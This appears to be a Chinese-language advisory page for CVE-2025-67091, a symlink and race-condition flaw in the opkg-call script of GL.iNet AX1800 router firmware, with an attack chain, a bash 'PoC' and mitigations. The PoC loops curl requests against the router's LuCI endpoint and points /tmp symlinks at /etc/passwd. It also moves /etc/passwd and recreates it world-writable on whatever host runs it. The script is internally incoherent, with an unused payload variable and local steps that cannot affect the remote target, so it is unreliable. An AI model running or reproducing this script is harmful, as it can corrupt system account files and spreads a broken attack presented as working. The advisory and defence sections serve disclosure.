CVE-2025-67091 GL-Inet AX1800 opkg-call符号链接攻击漏洞

漏洞信息

漏洞编号

CVE-2025-67091

漏洞类型

符号链接攻击/竞态条件

CVSS评分

6.5 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GL Inet GL.Inet AX1800

漏洞概述

CVE-2025-67091是GL.iNet AX1800路由器固件中的一个中等严重性安全漏洞。该漏洞存在于自定义opkg包装脚本/usr/libexec/opkg-call中，该脚本在执行包管理操作时被调用。问题核心在于脚本使用shell重定向在/tmp目录创建锁文件，而/tmp作为全局可写目录，为攻击者提供了可利用的攻击面。攻击者可以通过创建符号链接或利用竞态条件，在具有root权限的进程上下文中实现任意文件写入或覆盖，从而可能导致特权提升、拒绝服务或进一步的系统 compromise。此漏洞可通过LuCI web界面或认证API调用触发，无需额外用户交互即可被利用。

技术细节

漏洞存在于GL.iNet AX1800固件版本4.6.4和4.6.8的/usr/libexec/opkg-call脚本中。该脚本负责处理固件包管理操作，并以root用户权限运行。当脚本执行时，会使用shell重定向操作（如>或>>）在/tmp目录创建锁文件以实现进程同步。攻击者可以利用/tmp目录的全局可写权限，执行以下攻击：1）创建符号链接指向敏感系统文件（如/etc/passwd或/etc/shadow）；2）利用TOCTOU（Time-of-check to time-of-use）竞态条件在锁文件创建和写入之间插入恶意操作；3）预先创建同名文件或目录来干扰正常的文件操作流程。由于脚本以root权限运行，成功的符号链接攻击可能导致任意文件覆盖、配置篡改或特权提升。攻击者可通过web界面或API触发漏洞利用，攻击复杂度较低。

攻击链分析

STEP 1

步骤1

获取路由器访问权限：通过web界面或API认证登录GL.iNet AX1800路由器

STEP 2

步骤2

识别漏洞点：定位/usr/libexec/opkg-call脚本，分析其使用/tmp目录创建锁文件的代码路径

STEP 3

步骤3

创建恶意符号链接：在/tmp目录创建指向敏感系统文件（如/etc/passwd、/etc/shadow或SSH配置）的符号链接

STEP 4

步骤4

触发漏洞利用：通过LuCI界面或API调用包管理功能，诱导opkg-call脚本以root权限创建/覆盖符号链接指向的文件

STEP 5

步骤5

实现攻击目标：成功覆盖系统文件后，可实现特权提升、持久化访问或拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-67091 PoC - Symlink Attack on opkg-call
# Target: GL.iNet AX1800 Firmware 4.6.4/4.6.8

TARGET_IP="192.168.1.1"
TARGET_PORT=443

# Create malicious symlink to overwrite sensitive file
# Attack vector: /tmp directory is world-writable
MALICIOUS_CONTENT="malicious::0:0:root:/root:/bin/sh"

# Method 1: Symlink attack
ln -sf /etc/passwd /tmp/opkg_lock_$$ 2>/dev/null || true

# Method 2: Race condition exploitation
# Repeatedly trigger opkg operations while manipulating /tmp
for i in {1..100}; do
    rm -f /tmp/opkg_lock_* 2>/dev/null
    ln -sf /etc/passwd /tmp/opkg_lock_$$ 2>/dev/null
    # Trigger via web API
    curl -k -X POST "https://$TARGET_IP:$TARGET_PORT/cgi-bin/luci/admin/system/opkg" \
          -d "action=update&package=test" 2>/dev/null
    sleep 0.01
done

# Method 3: File replacement before lock creation
mv /etc/passwd /etc/passwd.bak 2>/dev/null
touch /etc/passwd && chmod 666 /etc/passwd 2>/dev/null

# Wait for opkg-call to create lock, then restore
sleep 1
mv /etc/passwd.bak /etc/passwd 2>/dev/null

影响范围

GL.iNet AX1800 固件 4.6.4

GL.iNet AX1800 固件 4.6.8

防御指南

临时缓解措施

在厂商发布固件更新前，可采取以下临时缓解措施：1）禁用不必要的包管理功能；2）通过防火墙限制对管理接口的访问，仅允许受信任的IP访问；3）监控/tmp目录下的文件创建行为，特别关注指向系统敏感文件的符号链接；4）定期检查系统文件完整性；5）考虑使用网络隔离，将管理网络与用户网络分离。由于该漏洞利用复杂度较低，建议尽快应用官方固件更新。